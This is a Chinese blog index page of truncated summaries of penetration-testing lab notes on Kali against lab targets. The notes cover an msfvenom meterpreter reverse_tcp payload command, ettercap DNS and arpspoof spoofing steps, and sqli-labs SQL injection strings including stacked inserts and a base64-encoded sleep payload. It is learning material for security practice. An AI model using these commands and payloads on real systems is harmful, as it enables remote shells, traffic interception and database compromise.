摘要: 实验环境: kali、winxp 生成木马文件 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -f exe > a.exe 打开msfconsole,等待文件执行弹回shell use exploit/multi/ha 阅读全文
posted @ 2020-08-26 17:48 f1veseven 阅读(221) 评论(0) 推荐(0) 编辑
摘要: 实验环境: kali(192.168.1.106) winxp(192.168.1.108) 工具: ettercap 操作步骤:vim /etc/ettercap/etter.dns 添加域名和kali的ip www.baidu.com A 192.168.1.106 开启kali的apache服 阅读全文
posted @ 2020-08-26 00:22 f1veseven 阅读(109) 评论(0) 推荐(0) 编辑
摘要: 实验环境: kali(192.168.1.106) win10(192.168.1.103) arpspoof: 两台主机在同一个内网里,kali直接nmap扫描出路由器地址和目标win10机的地址 nmap -sP 192.168.1.1/24 找出地址后用arpspoof开始欺骗 arpspoo 阅读全文
posted @ 2020-08-25 10:01 f1veseven 阅读(619) 评论(0) 推荐(0) 编辑
摘要: Brute Force: low 和 medium方法相同,用burp抓包跑字典 high中还包含了token,每次提交前都会验证token,用脚本抓取token验证 from bs4 import BeautifulSoup import requests header = {'User-Agen 阅读全文
posted @ 2020-08-02 21:07 f1veseven 阅读(208) 评论(0) 推荐(0) 编辑
摘要: (堆叠注入)Less-38: select * from table where id='1';';insert into user values(20,'test','test')%23Less-39:select * from table where id=1;Less-40:select * 阅读全文
posted @ 2020-08-01 12:35 f1veseven 阅读(122) 评论(0) 推荐(0) 编辑
摘要: (base64加密) Less-21: select * from table where cookie=('cookie');admin') and sleep(5)#>>YWRtaW4nKSBhbmQgc2xlZXAoNSkjsqlmap --tamper base64encode.py Les 阅读全文
posted @ 2020-07-31 14:16 f1veseven 阅读(122) 评论(0) 推荐(0) 编辑
摘要: 该环境客户端在访问服务器时服务器分为两个部分 Tomacat / jsp + apache / php 在已搭建apache + php的环境下我们再搭建一个tomcat + jsp环境即可 在官网下载jspstudy安装,安装路径和phpstudy同一级 将sqli-labs中的zip文件tomc 阅读全文
posted @ 2020-07-30 20:25 f1veseven 阅读(237) 评论(0) 推荐(0) 编辑
摘要: Less-1: select * from table where id='1' limit 0,1; Less-2: select * from table where id=1 limit 0,1; Less-3: select * from table where id=('1') limit 阅读全文
posted @ 2020-07-29 19:22 f1veseven 阅读(116) 评论(0) 推荐(0) 编辑
摘要: DDL语句: CREATE:create database xxx;create table xxx(id int,uname varchar(32));DROP:drop database xxx default charset utf8;drop table xxx;ALTER:alter ta 阅读全文
posted @ 2020-07-22 21:47 f1veseven 阅读(126) 评论(0) 推荐(0) 编辑
摘要: 命令执行函数system()exec()shell_exec()passthru()popen()proc_popen() windows中的命令执行 | 前面命令输出结果作为后面命令的输入内容 || 前面命令执行失败的时候才执行后面的命令 & 前面命令执行后接着执行后面的命令 && 前面命令执行成 阅读全文
posted @ 2020-07-17 17:46 f1veseven 阅读(164) 评论(0) 推荐(0) 编辑